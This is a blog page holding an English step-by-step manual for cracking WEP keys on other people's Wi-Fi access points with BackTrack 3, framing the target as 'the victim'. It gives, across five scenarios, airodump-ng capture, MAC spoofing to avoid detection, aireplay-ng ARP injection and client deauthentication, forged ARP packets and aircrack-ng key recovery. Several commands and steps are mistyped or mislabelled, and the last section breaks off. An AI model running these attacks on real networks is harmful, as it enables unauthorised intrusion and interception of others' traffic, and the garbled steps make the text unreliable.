JonsenElizee

浏览: 46838 次
性别:
来自: 北京

最近访客更多访客>>

duckim

博主相关

博客

微博

相册

留言

关于我

文章分类

全部博客 (43)

社区版块

存档分类

How To BT3

C C++C#.net Windows

BT3 Crack WEP WPA Manual

0. Make bootable USB

Format USB to fat32 under windows system.

Mount bt3-usb.iso.

Copy boot and BT3 folders into USB.

Run boot/bootinst.bat

OK.

Login into BT3 system (KDE)

Use: root

Pwd: toor

OK? Try this.

#startx

OK? Try this again.

#xconfig

#startx

Note

If the execution of the command not return immediately, just open a new shell to execute the next command.

Wireless Net Card WNC, yourself wireless net card.

Access Point AP, the victim.

1. CRACK OPEN WEP WITH VALID CLIENT ARP

Precondition

AP use WEP encrypting.

AP is Open model.

AP has valid client.

AP client can only generate valid ARP data.

Open the wireless switch of your laptop.

Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).

#modprobe –r iwl3945

Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.

#modeprobe ipwraw

#airmon-ng

#modinfo ipwraw

Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.

#airodump-ng wifi0

Suppose we get a AP as following

AP MAC	00:00:00:00:00:00
AP ESSID	tenda
AP Channel	11
AP Client MAC	CC:CC:CC:CC:CC:CC

Step4. Optioal. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11

#macchanger –m 11:11:11:11:11:11 wifi0

Step5. Activate the wifi0 and let it work on channel of AP.

#airmon-ng start wifi0 11

Optioal. Show wifi0 working model and wording channel

#iwconfi wifi0

Optioal. Test injection ability of yourself WNC.

#aireplay-ng -9 wifi0

Step6. Crack out the password of AP now.

#wesside-ng -i wifi0 –v 00:00:00:00:00:00

2. CRACK OPEN WEP WITH LOTS OF VALID CLIENT IVS DATA

Precondition

AP use WEP encrypting.

AP is Open model.

AP has valid client.

AP client can generate plenty of valid data.

We can get lots of ivs data from AP client.

Open the wireless switch of your laptop.

Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).

#modprobe –r iwl3945

Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.

#modeprobe ipwraw

#airmon-ng

#modinfo ipwraw

Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.

#airodump-ng wifi0

Suppose we get a AP as following:

AP MAC	00:00:00:00:00:00
AP ESSID	tenda
AP Channel	11
AP Client MAC	CC:CC:CC:CC:CC:CC

Step4. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11

#macchanger –m 11:11:11:11:11:11 wifi0

Step5. Activate the wifi0 and let it work on channel

#airmon-ng start wifi0 11

Show wifi0 working model and wording channel

#iwconfi wifi0

Test injection ability of yourself WNC.

#aireplay-ng -9 wifi0

Step6. Get ivs data file.-w <data file name> -c <channel>

#airodump-ng --ivs -w dumped_data -c 11 wifi0

Step7. Crack out the password of AP now.

#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs

3. CRACK OPEN WEP WITH LESS VALID CLIENT IVS DATA

Precondition

AP use WEP encrypting.

AP is Open model.

AP has valid client.

AP client can generate less valid ivs data.

Open the wireless switch of your laptop.

Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).

#modprobe –r iwl3945

Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.

#modeprobe ipwraw

#airmon-ng

#modinfo ipwraw

Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.

#airodump-ng wifi0

Suppose we get a AP as following:

AP MAC	00:00:00:00:00:00
AP ESSID	tenda
AP Channel	11
AP Client MAC	CC:CC:CC:CC:CC:CC

Step4. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11

#macchanger –m 11:11:11:11:11:11 wifi0

Step5. Activate the wifi0 and let it work on channel

#airmon-ng start wifi0 11

Show wifi0 working model and wording channel

#iwconfi wifi0

Test injection ability of yourself WNC.

#aireplay-ng -9 wifi0

Step6. Get ivs data file.-w <data file name> -c <channel>

#airodump-ng --ivs -w dumped_data -c 11 wifi0

Step7. Using ARP injection to get lots of ivs data. This step may take a long time to wait for ARP. You could use another PC or laptop to connect to the AP and supply a ARP packet.

#aireplay-ng -3 -b 00:00:00:00:00:00 -h CC:CC:CC:CC:CC:CC wifi0

Step8. Crack out the password of AP now.

#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs

4. CRACK OPEN WEP WITH VALID CLIENT BUT NO COMMUNICATION

Precondition

AP use WEP encrypting.

AP is Open model.

AP has valid client.

AP client do no communication to AP.

Open the wireless switch of your laptop.

Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).

#modprobe –r iwl3945

Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.

#modeprobe ipwraw

#airmon-ng

#modinfo ipwraw

Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.

#airodump-ng wifi0

Suppose we get a AP as following:

AP MAC	00:00:00:00:00:00
AP ESSID	tenda
AP Channel	11
AP Client MAC	CC:CC:CC:CC:CC:CC

Step4. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11

#macchanger –m 11:11:11:11:11:11 wifi0

Step5. Activate the wifi0 and let it work on channel

#airmon-ng start wifi0 11

Show wifi0 working model and wording channel

#iwconfi wifi0

Test injection ability of yourself WNC.

#aireplay-ng -9 wifi0

Step6. Get ivs data file.-w <data file name> -c <channel>

#airodump-ng --ivs -w dumped_data -c 11 wifi0

Step7. -0 force confliction model disconnect AP and AP client and let them reconnect.

#aireplay-ng -3 -b 00:00:00:00:00:00 -h CC:CC:CC:CC:CC:CC wifi0

Step8. Make use of reconnection data of Step7 to complete ARP injection.

#aireplay-ng -0 10 –a 00:00:00:00:00:00 -c CC:CC:CC:CC:CC:CC wifi0

5. CRACK OPEN WEP WITH OUT CLIENT

Precondition

AP use WEP encrypting.

AP is Open model.

AP has valid client.

AP client do no communication to AP.

Open the wireless switch of your laptop.

Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).

#modprobe –r iwl3945

Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.

#modeprobe ipwraw

#airmon-ng

#modinfo ipwraw

Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.

#airodump-ng wifi0

Suppose we get a AP as following:

AP MAC	00:00:00:00:00:00
AP ESSID	tenda
AP Channel	11
AP Client MAC	CC:CC:CC:CC:CC:CC

Step4. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11

#macchanger –m 11:11:11:11:11:11 wifi0

Step5. Activate the wifi0 and let it work on channel

#airmon-ng start wifi0 11

Show wifi0 working model and wording channel

#iwconfi wifi0

Test injection ability of yourself WNC.

#aireplay-ng -9 wifi0

Step6. Get ivs data file.-w <data file name> -c <channel>

#airodump-ng --ivs -w dumped_data -c 11 wifi0

Step7. For there is no AP client, We need to create a virtual connection to AP. So, make a association from your WNC to the AP now.

#aireplay-ng -1 0 -e tenda -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0

Failure Reason

AP has MAC filter.

Feeble signal from AP.

AP has WPA encryption.

Conflict between WNC and MAC. e.g. different working channel.

Try

Cancel the [–e tenda]parameter.

Set lower rate. E.g. #iwconfig wifi0 rate 2M

To confirm the virtual connection.

# tcpdump -n -e -s0 -vvv -i wifi0

There are three kind of methods to do future cracking work.

Case1

Step8. Using -2 attack model. it can do seizing data, extracting data and injecting data.

#aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0

Enter [Y/y] for question “Use this packet ?” to launch the attack.

After get enough ivs data, you could use aircrack-ng to do crack.

Step9. Using aircrack-ng. AS #aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs

Case2

Step8. Get xor file that contains valid password information. The generated xor file name is start with “fragment”.

#aireplay-ng -5 -b <ap mac> -h <my mac> wifi0

Step9. Using xor file, create a fake ARP packet. –y xor_file –w fake_arp_file

#packetforge-ng -0 -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 -k 255.255.255.255 –l 255.255.255.255 –y fragment-xxxx-xxxxxx.xor -w myarp

Step10. Using -2 attack model. –r fake_arp_file –x data_sent_rate, less than 1024

EN-U

分享到：

How To install rap 1.3.0-M2-20090929-114 ... | ACE TAO Programming [005] 简单介绍日志功 ...

2009-10-22 14:23
浏览 832
评论(0)
查看更多

发表评论

您还没有登录,请您登录后再发表评论

最近访客更多访客>>

博主相关

文章分类

社区版块

存档分类

最新评论

How To BT3

BT3 Crack WEP WPA Manual

0. Make bootable USB

1. CRACK OPEN WEP WITH VALID CLIENT ARP

2. CRACK OPEN WEP WITH LOTS OF VALID CLIENT IVS DATA

3. CRACK OPEN WEP WITH LESS VALID CLIENT IVS DATA

4. CRACK OPEN WEP WITH VALID CLIENT BUT NO COMMUNICATION

5. CRACK OPEN WEP WITH OUT CLIENT

评论

发表评论

相关推荐

最近访客 更多访客>>

博主相关

文章分类

社区版块

存档分类

最新评论

How To BT3

BT3 Crack WEP WPA Manual

0. Make bootable USB

1. CRACK OPEN WEP WITH VALID CLIENT ARP

2. CRACK OPEN WEP WITH LOTS OF VALID CLIENT IVS DATA

3. CRACK OPEN WEP WITH LESS VALID CLIENT IVS DATA

4. CRACK OPEN WEP WITH VALID CLIENT BUT NO COMMUNICATION

5. CRACK OPEN WEP WITH OUT CLIENT

评论

发表评论

相关推荐

最近访客更多访客>>